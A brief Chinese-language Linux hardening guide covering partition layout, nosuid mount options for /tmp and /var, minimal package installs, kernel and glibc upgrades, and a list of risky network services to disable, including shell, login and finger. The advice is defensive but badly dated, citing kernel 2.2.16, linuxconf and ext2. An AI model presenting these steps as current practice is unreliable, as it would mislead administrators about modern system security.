Linux安全配置步骤简述一、磁盘分区1、如果是新安装系统，对磁盘分区应考虑安全性：1)根目录(/)、用户目录(/home)、临时目录(/tmp)和/var目录应分开到不同的磁盘分区;2)以上各目录所在分区的磁盘空间大小应充分考虑，避免因某些原因造成分区空间用完而导致系统崩溃;2、对于/tmp和/var目录所在分区，大多数情况下不需要有suid 属性的程序，所以应为这些分区添加nosuid属性;方法一：修改/etc/fstab文件，添加nosuid属性字。

例如：/dev/hda2 /tmp ext2 exec,dev,nosuid,rw 0 0^^^^^^方法二：如果对/etc/fstab文件操作不熟，建议通过linuxconf程序来修改。

* 运行linuxconf程序;* 选择"File systems"下的"Access local drive";* 选择需要修改属性的磁盘分区;* 选择"No setuid programs allowed"选项;* 根据需要选择其它可选项;* 正常退出。

(一般会提示重新mount该分区)二、安装1、对于非测试主机，不应安装过多的软件包。

这样可以降低因软件包而导致出现安全漏洞的可能性。

2、对于非测试主机，在选择主机启动服务时不应选择非必需的服务。

例如routed、ypbind等。

三、安全配置与增强内核升级。

起码要升级至2.2.16以上版本。

GNU libc共享库升级。

(警告：如果没有经验，不可轻易尝试。

可暂缓。

)关闭危险的网络服务。

echo、chargen、shell、login、finger、NFS、RPC等关闭非必需的网络服务。